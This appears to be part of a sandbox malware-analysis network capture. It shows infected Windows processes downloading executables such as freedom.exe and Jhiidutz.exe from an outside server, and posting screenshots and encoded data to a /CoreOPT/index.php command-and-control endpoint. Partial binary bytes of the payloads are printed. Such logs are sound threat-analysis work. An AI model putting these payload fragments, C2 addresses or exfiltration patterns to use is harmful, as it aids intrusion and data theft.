Aug 31, 2024 22:42:23.232404947 CEST	1236	IN	Data Raw: fb 45 29 a3 b9 0d 9b ca 7e 5d ee 4a 32 0b 97 82 11 4d 4e 7d 41 2c 1d ec 3c 0b 78 e1 1c c5 3c 29 4a 1f 1a 57 20 89 ad aa da cf 6e 95 c7 d2 c0 73 85 63 b2 22 50 81 3e 09 7c fe af 4e 10 ee 6d 78 50 f9 a5 bf 61 88 4a 70 6f b3 ed 6e f2 97 75 c5 ea c3 Data Ascii: E)~]J2MN}A,<x<)JW nsc"P>\|NmxPaJponu1\|6F8~^+yu,N'G(=Z*AV'qN_l-9nNX+-hK?M%ZAa
Aug 31, 2024 22:42:24.534830093 CEST	120	OUT	GET /freedom.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:24.727998018 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:24 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 08 Aug 2024 03:39:14 GMT ETag: "17800-61f23c5420f4f" Accept-Ranges: bytes Content-Length: 96256 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 3d b4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 08 00 00 00 00 00 00 2e 8d 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 8c 01 00 4f 00 00 00 00 a0 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=fn. @ @O H.text4m n `.rsrcp@@.relocv@BHgH%&(rp (rCpssssrgp* ghrp rr/p rp p{rp* ?((rp* rp S(+-(,,+(-,+(,+(),(Z"(+"(+&(9&++5sk 'ol(,~-(b(T~om&-rap rp y4r)p E/rprprUprp*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49778	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:22.996107101 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAwNjE1 Host: 185.215.113.19 Content-Length: 100767 Cache-Control: no-cache
Aug 31, 2024 22:42:22.996239901 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 77 4e 6a 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAwNjE1Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:22.996295929 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:22.996364117 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:22.996381044 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:22.996403933 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:22.996428013 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:22.996455908 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:22.996512890 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:22.996534109 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:22.996561050 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:24.650955915 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:24.654633045 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:25.019325018 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:25.141453028 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:25.568514109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49779	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:23.200248003 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:24.139478922 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:24.147083998 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:24.531030893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49780	185.216.214.225	80	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:23.223045111 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:23.854779005 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:23.854790926 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:23.854805946 CEST	1236	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:23.854820013 CEST	1236	IN	Data Raw: d7 78 b5 74 70 4f 6b 98 da 97 8c ad bf 38 8a f4 36 46 30 1a 6d c4 e4 29 6a 3f 82 39 1d 6c ef 88 d7 e8 ab 7d 98 dc 9f f4 a8 61 b3 ae 58 a5 ab c2 1a 73 c7 c8 b2 ca 50 36 52 fe cc 7b 69 29 4c 0d 2b a6 49 af 86 35 12 a3 ce 45 01 e5 bc dc 39 2b db 5b Data Ascii: xtpOk86F0m)j?9l}aXsP6R{i)L+I5E9+[`J-)gH9` zs`;kW&:j5/bw8cuie2M4(0/xf0HU&#\.Y3n$A45ydW%PkUm2@j_^hQ<
Aug 31, 2024 22:42:23.854835033 CEST	1236	IN	Data Raw: 77 b8 e9 1d ee fc 08 3c 24 7f e5 54 42 ed ec b4 b1 1b b2 e6 2b 0b ef f9 f2 60 3b 0a 7d c3 6f 51 6a ba cd 2b 3b 75 fc 38 e1 6d c3 0e 76 95 d4 7f 59 bb 1e 99 f1 cc c8 19 32 8b c6 ca a2 2c 17 5a 81 92 db ed 4f eb bc 5c 57 de 5c a3 4c b9 63 be 40 ab Data Ascii: w<$TB+`;}oQj+;u8mvY2,ZO\W\Lc@O>m7%6~@=j:$[HD{[?>MBs\ONs5+_GijL`5Pn)c0CWV#mg3xm&eW,;zark
Aug 31, 2024 22:42:23.854846954 CEST	1236	IN	Data Raw: 3e 26 06 09 08 96 d2 f9 cc fe 32 fa ab 3a 2c 68 cb 80 81 0b 41 ef 4a 36 05 19 e6 80 f1 8a b0 22 b5 b1 8f a9 8b 72 1b 93 e9 7e 76 bb 3e 54 6e 67 21 c4 15 f6 8b bf 53 a4 ae 20 34 88 28 f3 d9 71 ea ee 94 e7 de f4 38 32 b8 4a 1f 4b aa 89 00 59 f6 7f Data Ascii: >&2:,hAJ6"r~v>Tng!S 4(q82JKY{v_\|:A&C5':1'bb7w0So<i0c<rN\|@0_a,RnrxAhm+#$ `b%/JdFXG*De {6?F#W
Aug 31, 2024 22:42:23.854859114 CEST	1236	IN	Data Raw: cd 91 b4 e0 93 e5 28 4d 2f 60 4a 0c 36 60 3f 2e 04 41 fb ae 9d b4 5b 6d ca 14 ef 78 a1 6f a7 d0 8d d6 be 8c 9d b9 f0 3c 24 5a a0 75 63 6e 5b fe 0a 02 42 01 10 24 a9 5e 8c ce 03 c8 06 8f 18 e8 5b 5d d5 6e 41 68 43 0f 37 77 fe f8 70 fb 6a 6b 89 23 Data Ascii: (M/`J6`?.A[mxo<$Zucn[B$^[]nAhC7wpjk#7sn&-!xAc^\-)fLb8t9g3Lwd 8Rh>$gcBzIF5)i:]Q)bV,_E97sUo)Do<S_U/
Aug 31, 2024 22:42:23.854867935 CEST	108	IN	Data Raw: 18 96 64 84 ee 36 3e ac a9 59 52 43 44 e8 40 69 6d ab e1 b5 a4 77 9f 4c 25 ec 86 fb 00 31 ec 2f 2f d7 48 05 d3 22 64 5e d6 7b 68 36 cf 7e 7e 1c 89 af 12 b9 57 0a 9d 45 65 29 fe 35 ba 27 02 5a 10 68 9a 12 df cb c1 fc b0 25 10 66 22 f9 61 50 b7 ef Data Ascii: d6>YRCD@imwL%1//H"d^{h6~~WEe)5'Zh%f"aPgLp)ECFNpz)D
Aug 31, 2024 22:42:23.854983091 CEST	1236	IN	Data Raw: a8 b4 df 58 8e ac 7a a5 8d 10 b5 20 85 44 e7 66 ae 43 7a 43 8b 9a e3 46 94 4f cc 96 52 04 49 57 58 b8 7f a4 68 0e c9 50 1a d6 39 1f 3e fe 6e 57 4d e2 fe 70 af 96 2b 4d 31 58 83 f5 8c c7 e0 e6 8c 03 bd 9f 95 dc c8 a8 76 94 8f be 64 7c 4f 12 90 ab Data Ascii: Xz DfCzCFORIWXhP9>nWMp+M1Xvd\|OZ(}e8)i6Dam=J!"E:xQYt"<D}s.>M`z<?S6nMK+.ioq2Sx\|tA6d~STu&HwI@'O6$/RO@w
Aug 31, 2024 22:42:23.854993105 CEST	1236	IN	Data Raw: c1 a9 55 64 02 e1 56 12 52 1d 61 6b 9f 75 66 0f f7 77 fe ae 4c 09 f9 9c 6a 1a e2 77 5f d5 b8 0f 57 75 84 96 d0 ab 75 e4 70 fd b4 6f b1 f2 16 6b ed ba be 8c 64 59 3d 30 bf 8f 28 a8 09 8c f8 ee 0b 3c d4 64 c3 dc 17 b1 b0 c8 b7 18 ae 2b 00 d0 9f 86 Data Ascii: UdVRakufwLjw_WuupokdY=0(<d+6_nh<}TKhY{-)*p_f4-(cU!^GD$9V:>Fk,8>if2u3`.s<'kaY
Aug 31, 2024 22:42:23.859729052 CEST	1236	IN	Data Raw: fb 45 29 a3 b9 0d 9b ca 7e 5d ee 4a 32 0b 97 82 11 4d 4e 7d 41 2c 1d ec 3c 0b 78 e1 1c c5 3c 29 4a 1f 1a 57 20 89 ad aa da cf 6e 95 c7 d2 c0 73 85 63 b2 22 50 81 3e 09 7c fe af 4e 10 ee 6d 78 50 f9 a5 bf 61 88 4a 70 6f b3 ed 6e f2 97 75 c5 ea c3 Data Ascii: E)~]J2MN}A,<x<)JW nsc"P>\|NmxPaJponu1\|6F8~^+yu,N'G(=Z*AV'qN_l-9nNX+-hK?M%ZAa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49781	185.216.214.225	80	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:23.884828091 CEST	120	OUT	GET /freedom.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:24.514501095 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:24 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 08 Aug 2024 03:39:14 GMT ETag: "17800-61f23c5420f4f" Accept-Ranges: bytes Content-Length: 96256 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 3d b4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 08 00 00 00 00 00 00 2e 8d 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 8c 01 00 4f 00 00 00 00 a0 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=fn. @ @O H.text4m n `.rsrcp@@.relocv@BHgH%&(rp (rCpssssrgp* ghrp rr/p rp p{rp* ?((rp* rp S(+-(,,+(-,+(,+(),(Z"(+"(+&(9&++5sk 'ol(,~-(b(T~om&-rap rp y4r)p E/rprprUprp*
Aug 31, 2024 22:42:24.514508009 CEST	224	IN	Data Raw: 20 ee cd 27 04 2a 1a 72 1d 0d 00 70 2a 1a 20 84 2b 75 01 2a 1a 72 81 0d 00 70 2a 1a 20 44 18 b7 00 2a 1a 72 e5 0d 00 70 2a 1a 20 fa b3 e9 02 2a 1a 72 49 0e 00 70 2a 1a 20 09 8d 39 05 2a 1a 72 ad 0e 00 70 2a 1a 72 11 0f 00 70 2a 1a 72 75 0f 00 70 Data Ascii: 'rp +urp Drp rIp 9rprprup {rp Jjsn~"(d+:t(_+rCp* mrp =rp
Aug 31, 2024 22:42:24.514522076 CEST	1236	IN	Data Raw: 20 be 5c a3 00 2a 1a 72 6f 13 00 70 2a 1a 20 8b a5 0a 01 2a 1a 72 d3 13 00 70 2a 1a 20 c6 28 54 04 2a 1a 72 37 14 00 70 2a 1a 72 9b 14 00 70 2a 1a 72 ff 14 00 70 2a 1a 72 63 15 00 70 2a 1a 72 c7 15 00 70 2a 1a 20 6d d4 60 02 2a 1a 72 2b 16 00 70 Data Ascii: \rop rp (Tr7prprprcprp m`r+p wtrp MOrprWprp r`p rrp ^rp M^rOp nrp rp zB~("!:(-(
Aug 31, 2024 22:42:24.514573097 CEST	1236	IN	Data Raw: 4f 00 70 2a 1a 72 9a 50 00 70 2a 1a 72 63 51 00 70 2a 1a 20 90 bc 0a 05 2a 1a 72 2c 52 00 70 2a 1a 72 f5 52 00 70 2a 1a 72 be 53 00 70 2a 1a 20 cb f7 57 04 2a 1a 72 87 54 00 70 2a 1a 72 50 55 00 70 2a 1a 20 9d 36 88 01 2a 1a 72 19 56 00 70 2a 1a Data Ascii: OprPprcQp* r,RprRprSp WrTprPUp* 6rVprVp0~o+0~o+0~o +0~o!+0("(#+0
Aug 31, 2024 22:42:24.514578104 CEST	1236	IN	Data Raw: 00 28 08 00 00 06 6f 44 00 00 0a 6f 45 00 00 0a 72 23 07 00 70 17 6f 46 00 00 0a 7e 0f 00 00 04 28 3f 00 00 0a 06 6f 47 00 00 0a de 0f 25 28 2f 00 00 0a 13 0b 28 31 00 00 0a de 00 1d 28 48 00 00 0a 72 51 06 00 70 7e 0f 00 00 04 28 3f 00 00 0a 72 Data Ascii: (oDoEr#poF~(?oG%(/(1(HrQp~(?rp(Irprp(JrpG(K,("6(%(Lt6rp(Mrp
Aug 31, 2024 22:42:24.514590979 CEST	672	IN	Data Raw: 00 00 01 6f 68 00 00 0a dc de 0f 09 2c 0b 09 74 52 00 00 01 6f 68 00 00 0a dc de 0f 07 2c 0b 07 74 52 00 00 01 6f 68 00 00 0a dc de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 16 0a 2b 00 06 2a 41 64 00 00 02 00 00 00 26 00 00 00 d6 00 00 00 fc 00 00 Data Ascii: oh,tRoh,tRoh(/(1+Ad&&%66701(Voi(/&(/(1(17
Aug 31, 2024 22:42:24.514647961 CEST	1236	IN	Data Raw: 00 00 06 28 2d 00 00 0a 28 60 00 00 06 16 80 20 00 00 04 7e 16 00 00 04 7e 18 00 00 04 16 7e 18 00 00 04 8e b7 16 14 fe 06 5e 00 00 06 73 79 00 00 0a 14 6f 7a 00 00 0a 26 14 fe 06 65 00 00 06 73 7b 00 00 0a 0b 07 14 73 6b 00 00 0a 20 10 27 00 00 Data Ascii: (-(` ~~~^syoz&es{sk ' :olsk ' :ols\|cs{s\| %(/(1~o}&*A47""0
Aug 31, 2024 22:42:24.514653921 CEST	1236	IN	Data Raw: 6f 8d 00 00 0a 6f 8e 00 00 0a 13 05 2b 30 11 05 6f 8f 00 00 0a 74 69 00 00 01 13 04 09 11 04 72 ab 11 00 70 6f 90 00 00 0a 28 9a 00 00 0a 72 7b 10 00 70 28 9a 00 00 0a 28 2d 00 00 0a 0d 11 05 6f 92 00 00 0a 2d c7 de 0c 11 05 2c 07 11 05 6f 68 00 Data Ascii: oo+0otirpo(r{p((-o-,oh(/rp(1(1*Jbtt70rpsorpoo&rprporprporprpo0r
Aug 31, 2024 22:42:24.514669895 CEST	448	IN	Data Raw: 0a 06 2c 06 06 6f 68 00 00 0a dc de 14 25 28 2f 00 00 0a 0d 16 80 15 00 00 04 28 31 00 00 0a de 00 de 0c 11 05 2c 07 11 04 28 b1 00 00 0a dc 2a 00 00 00 01 28 00 00 02 00 2a 00 70 9a 00 0a 00 00 00 00 00 00 24 00 82 a6 00 14 37 00 00 01 02 00 11 Data Ascii: ,oh%(/(1,((p$70#~o&%(/(1*70~, ~o%(/(1~, ~o%(/(1
Aug 31, 2024 22:42:24.514676094 CEST	1236	IN	Data Raw: 28 31 00 00 0a de 00 2a 00 00 00 01 10 00 00 00 00 00 00 1c 1c 00 0c 37 00 00 01 1b 30 03 00 5d 00 00 00 1f 00 00 11 7e 15 00 00 04 2c 45 1b 8d 36 00 00 01 0b 07 16 72 37 12 00 70 a2 07 17 7e 0a 00 00 04 a2 07 18 28 3e 01 00 06 a2 07 19 7e 0a 00 Data Ascii: (170]~,E6r7p~(>~~?(@(` (%(/(1NN70 (H(@~!(-(r>p(e3/ r>p~~((2
Aug 31, 2024 22:42:24.520226002 CEST	1236	IN	Data Raw: 0a 28 60 00 00 06 38 75 03 00 00 11 13 72 10 1e 00 70 16 28 65 00 00 0a 16 40 91 00 00 00 06 17 9a 06 18 9a 28 c8 00 00 0a 72 1e 1e 00 70 7e 21 00 00 04 28 c6 00 00 0a 28 41 01 00 06 28 c6 00 00 0a 7e 21 00 00 04 28 c6 00 00 0a 72 30 1e 00 70 28 Data Ascii: (`8urp(e@(rp~!((A(~!(r0p((-(`H%(/r^p~!((A(~!(o((-(`(18rpp(e3rpp(`8rzp(e3(rzp~!((A(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:25.339931011 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAxMjY0 Host: 185.215.113.19 Content-Length: 101416 Cache-Control: no-cache
Aug 31, 2024 22:42:25.339962006 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 78 4d 6a 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAxMjY0Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:25.340017080 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:25.340017080 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:25.340053082 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:25.340078115 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:25.340166092 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:25.340166092 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:25.340202093 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:25.340214968 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:25.340240955 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:26.968827009 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49784	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
